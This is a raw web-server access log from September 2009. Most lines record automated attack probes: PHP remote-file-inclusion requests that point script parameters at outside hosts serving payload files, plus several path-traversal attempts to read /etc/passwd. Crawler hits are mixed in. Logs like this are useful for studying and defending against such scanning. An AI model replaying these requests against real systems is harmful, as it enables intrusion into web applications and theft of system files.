204.202.2.23 - - [06/Sep/2009:19:00:32 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
204.202.2.23 - - [06/Sep/2009:19:00:32 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
204.202.2.23 - - [06/Sep/2009:19:00:32 -0500] "GET /logs/access_log.1244764800//include/admin.lib.inc.php?site_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:01:36 -0500] "GET /logs/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [06/Sep/2009:19:01:36 -0500] "GET /logs/access_log.1236211200/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [06/Sep/2009:19:01:36 -0500] "GET /error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [06/Sep/2009:19:02:11 -0500] "GET /logs/access_log.1236038400/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
86.59.104.147 - - [06/Sep/2009:19:03:38 -0500] "GET /logs/access_log.1244764800//WebCalendar/tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
86.59.104.147 - - [06/Sep/2009:19:03:38 -0500] "GET /logs//WebCalendar/tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
86.59.104.147 - - [06/Sep/2009:19:03:38 -0500] "GET //WebCalendar/tools/send_reminders.php?noSet=0&includedir=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:03:40 -0500] "GET /logs/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
94.136.37.141 - - [06/Sep/2009:19:03:40 -0500] "GET /error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
94.136.37.141 - - [06/Sep/2009:19:04:57 -0500] "GET /logs/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [06/Sep/2009:19:04:57 -0500] "GET /logs/access_log.1236211200/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [06/Sep/2009:19:04:57 -0500] "GET /error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
203.237.238.234 - - [06/Sep/2009:19:06:23 -0500] "GET /logs//bbs/skin/ggambo7002_gallery/setup.php?dir=http://GN.fileave.com/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
203.237.238.234 - - [06/Sep/2009:19:06:23 -0500] "GET /logs/access_log.1247443200//bbs/skin/ggambo7002_gallery/setup.php?dir=http://GN.fileave.com/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
203.237.238.234 - - [06/Sep/2009:19:06:23 -0500] "GET //bbs/skin/ggambo7002_gallery/setup.php?dir=http://GN.fileave.com/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:06:48 -0500] "GET /logs/error.php?dir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
94.136.37.141 - - [06/Sep/2009:19:06:48 -0500] "GET /error.php?dir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
203.237.238.234 - - [06/Sep/2009:19:06:53 -0500] "GET /logs/access_log.1247875200//bbs/skin/ggambo7002_gallery/setup.php?dir=http://GN.fileave.com/id1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:08:09 -0500] "GET /logs/error.php?dir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
94.136.37.141 - - [06/Sep/2009:19:08:09 -0500] "GET /error.php?dir=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
94.136.37.141 - - [06/Sep/2009:19:08:41 -0500] "GET /logs/access_log.1236038400/error.php?dir=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [06/Sep/2009:19:11:37 -0500] "GET /logs/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:11:37 -0500] "GET /logs/access_log.1234224000/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:11:37 -0500] "GET /error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:11:37 -0500] "GET /logs/access_log.1229817600/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:12:00 -0500] "GET /logs/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:12:00 -0500] "GET /logs/access_log.1229817600/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:12:00 -0500] "GET /logs/access_log.1234224000/error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
94.136.37.141 - - [06/Sep/2009:19:12:00 -0500] "GET /error.php?dir=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
65.55.106.135 - - [06/Sep/2009:19:13:02 -0500] "GET /logs/access_log.1166659200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.112 - - [06/Sep/2009:19:15:32 -0500] "GET /logs/access_log.1188777600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.194.85.198 - - [06/Sep/2009:19:16:58 -0500] "GET /logs//index.php?nic=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 298 "-""libwww-perl/5.831"
213.186.117.226 - - [06/Sep/2009:19:18:26 -0500] "GET //paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:19:18:26 -0500] "GET /logs//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:19:18:26 -0500] "GET /logs/access_log.1244764800//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:19:18:27 -0500] "GET /logs/access_log.1237075200//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:19:18:35 -0500] "GET /logs//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:19:18:35 -0500] "GET //paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
213.186.117.226 - - [06/Sep/2009:19:18:36 -0500] "GET /logs/access_log.1236384000//paginedinamiche/main.php?pagina=http://www.huchems.com/ir/admin/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
79.13.185.108 - - [06/Sep/2009:19:19:36 -0500] "GET //index.php?DOCUMENT_ROOT=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
79.13.185.108 - - [06/Sep/2009:19:19:36 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
79.13.185.108 - - [06/Sep/2009:19:19:36 -0500] "GET /logs/access_log.1237420800//index.php?DOCUMENT_ROOT=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.132.238.188 - - [06/Sep/2009:19:19:38 -0500] "GET //index.php?nic=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 293 "-""libwww-perl/5.800"
63.249.95.132 - - [06/Sep/2009:19:26:08 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 317 "-""-"
63.249.95.132 - - [06/Sep/2009:19:26:08 -0500] "GET /modules/My_eGallery/index.php?basepath=http://cr0d.interfree.it/bovsp.txt?????&mode=id HTTP/1.1" 404 312 "-""-"
65.182.186.172 - - [06/Sep/2009:19:37:42 -0500] "GET //?commonpath=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.182.186.172 - - [06/Sep/2009:19:37:42 -0500] "GET /logs/access_log.1241654400//?commonpath=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 311 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.182.186.172 - - [06/Sep/2009:19:37:42 -0500] "GET /logs//?commonpath=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 204075 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.182.186.172 - - [06/Sep/2009:19:39:04 -0500] "GET /logs/access_log.1239580800//?commonpath=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 311 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
82.194.85.198 - - [06/Sep/2009:19:39:49 -0500] "GET /logs///index.php?nic=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
218.38.136.251 - - [06/Sep/2009:19:41:46 -0500] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:19:41:46 -0500] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:19:41:46 -0500] "GET /logs/access_log.1237507200/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.110 - - [06/Sep/2009:19:42:33 -0500] "GET /logs/access_log.1172361600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.94 - - [06/Sep/2009:19:44:03 -0500] "GET /logs/access_log.1249776000 HTTP/1.0" 200 599430 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.132.238.188 - - [06/Sep/2009:19:49:37 -0500] "GET //errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
65.55.106.113 - - [06/Sep/2009:19:50:52 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.113 - - [06/Sep/2009:19:51:34 -0500] "GET /logs/access_log.1122249600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.132.238.188 - - [06/Sep/2009:19:52:55 -0500] "GET //errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
65.55.106.230 - - [06/Sep/2009:19:53:03 -0500] "GET /logs/access_log.1182729600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.194.85.198 - - [06/Sep/2009:19:53:14 -0500] "GET /logs//errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
82.194.85.198 - - [06/Sep/2009:19:55:00 -0500] "GET /logs///errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
209.132.238.188 - - [06/Sep/2009:19:55:09 -0500] "GET //errors.php?error=http://jrigutto.com/Coppermine/albums/id? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
65.55.106.187 - - [06/Sep/2009:19:59:03 -0500] "GET /logs/access_log.1113868800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.211 - - [06/Sep/2009:20:12:03 -0500] "GET /logs/access_log.1133568000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.126 - - [06/Sep/2009:20:12:33 -0500] "GET /logs/access_log.1220659200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.157 - - [06/Sep/2009:20:20:02 -0500] "GET /logs/access_log.1186272000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.95 - - [06/Sep/2009:20:22:03 -0500] "GET /logs/access_log.1130544000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [06/Sep/2009:20:26:49 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:20:26:49 -0500] "GET /logs/access_log.1240444800//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:20:26:49 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:20:26:49 -0500] "GET /logs/access_log.1235433600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:20:29:08 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:20:29:08 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:20:29:08 -0500] "GET /logs/access_log.1240444800//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
218.38.136.251 - - [06/Sep/2009:20:29:09 -0500] "GET /logs/access_log.1235433600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
79.13.185.108 - - [06/Sep/2009:20:31:42 -0500] "GET //common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
79.13.185.108 - - [06/Sep/2009:20:31:43 -0500] "GET /logs//common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
79.13.185.108 - - [06/Sep/2009:20:31:45 -0500] "GET /logs/access_log.1242777600//common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
79.13.185.108 - - [06/Sep/2009:20:32:20 -0500] "GET /logs/access_log.1246924800//common/db.php?commonpath=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.233.69.41 - - [06/Sep/2009:20:32:44 -0500] "GET //login.tpl.php?theme=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.233.69.41 - - [06/Sep/2009:20:32:44 -0500] "GET /logs/access_log.1232409600//login.tpl.php?theme=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.233.69.41 - - [06/Sep/2009:20:32:44 -0500] "GET /logs/access_log.1232496000//login.tpl.php?theme=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.233.69.41 - - [06/Sep/2009:20:32:44 -0500] "GET /logs//login.tpl.php?theme=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.233.69.41 - - [06/Sep/2009:20:33:00 -0500] "GET /logs///cgi-bin//gadgets/Blog/BlogModel.php?path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.233.69.41 - - [06/Sep/2009:20:33:00 -0500] "GET /logs/access_log.1238112000///cgi-bin//gadgets/Blog/BlogModel.php?path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.233.69.41 - - [06/Sep/2009:20:33:00 -0500] "GET ///cgi-bin//gadgets/Blog/BlogModel.php?path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
98.174.154.206 - - [06/Sep/2009:20:35:13 -0500] "GET /logs/access_log.1232755200//xmlsrv/xmlrpc.php? HTTP/1.1" 404 328 "-""libwww-perl/5.814"
98.174.154.206 - - [06/Sep/2009:20:35:13 -0500] "GET //xmlsrv/xmlrpc.php? HTTP/1.1" 404 301 "-""libwww-perl/5.814"
98.174.154.206 - - [06/Sep/2009:20:35:13 -0500] "GET /logs//xmlsrv/xmlrpc.php? HTTP/1.1" 404 306 "-""libwww-perl/5.814"
67.19.118.186 - - [06/Sep/2009:20:39:39 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.19.118.186 - - [06/Sep/2009:20:39:39 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
67.19.118.186 - - [06/Sep/2009:20:39:43 -0500] "GET /logs/access_log.1248134400//phpsecurityadmin/include/logout.php?PSA_PATH=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.182.186.172 - - [06/Sep/2009:20:43:22 -0500] "GET /logs/access_log.1241654400/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.182.186.172 - - [06/Sep/2009:20:43:22 -0500] "GET /?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.182.186.172 - - [06/Sep/2009:20:43:23 -0500] "GET /logs/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 204070 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.182.186.172 - - [06/Sep/2009:20:43:47 -0500] "GET /logs/access_log.1239580800/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.52.118.157 - - [06/Sep/2009:20:45:10 -0500] "GET /logs/agenda.php3?rootagenda=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.52.118.157 - - [06/Sep/2009:20:45:10 -0500] "GET /agenda.php3?rootagenda=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
119.148.69.90 - - [06/Sep/2009:20:51:46 -0500] "GET /logs/services.php?page=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""-"
119.148.69.90 - - [06/Sep/2009:20:51:48 -0500] "GET /services.php?page=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""-"
65.55.106.228 - - [06/Sep/2009:20:52:03 -0500] "GET /logs/access_log.1198886400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.84.141.226 - - [06/Sep/2009:20:52:18 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.84.141.226 - - [06/Sep/2009:20:52:18 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.84.141.226 - - [06/Sep/2009:20:52:19 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.242.165.138 - - [06/Sep/2009:20:52:25 -0500] "GET /index.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
123.242.165.138 - - [06/Sep/2009:20:52:27 -0500] "GET /index.php?_zb_path=http://www.greek-portal.com/fyrom_info/id???? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
72.29.82.154 - - [06/Sep/2009:20:53:48 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:20:53:48 -0500] "GET //?path%5Bdocroot%5D=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:20:53:48 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
72.29.82.154 - - [06/Sep/2009:20:53:54 -0500] "GET /logs/access_log.1242259200//?path%5Bdocroot%5D=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.107.181 - - [06/Sep/2009:20:54:33 -0500] "GET /logs/access_log.1134691200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.84.141.226 - - [06/Sep/2009:20:55:19 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.medialabs.it/wordpress/fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.234.100.46 - - [06/Sep/2009:20:58:18 -0500] "GET /logs/access_log.1241654400%22%20target=%22_blank/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.234.100.46 - - [06/Sep/2009:20:58:18 -0500] "GET /?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.234.100.46 - - [06/Sep/2009:20:58:20 -0500] "GET /logs/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 200 204070 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.234.100.46 - - [06/Sep/2009:20:59:14 -0500] "GET /logs/access_log.1239667200%22%20target=%22_blank/?DOCUMENT_ROOT=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
211.233.69.41 - - [06/Sep/2009:21:01:27 -0500] "GET /logs/access_log.1246924800//theme/format.php?_page_content=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.233.69.41 - - [06/Sep/2009:21:01:27 -0500] "GET /logs//theme/format.php?_page_content=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.233.69.41 - - [06/Sep/2009:21:01:27 -0500] "GET //theme/format.php?_page_content=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:21:01:28 -0500] "GET /logs/access_log.1238457600//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:21:01:28 -0500] "GET /logs/access_log.1235260800//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:21:01:28 -0500] "GET /logs//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:21:01:28 -0500] "GET //components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:21:01:28 -0500] "GET /logs//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:21:01:28 -0500] "GET /logs/access_log.1235260800//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
206.225.23.4 - - [06/Sep/2009:21:01:28 -0500] "GET /logs/access_log.1238457600//components/com_jce/jce.php?mosConfig_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
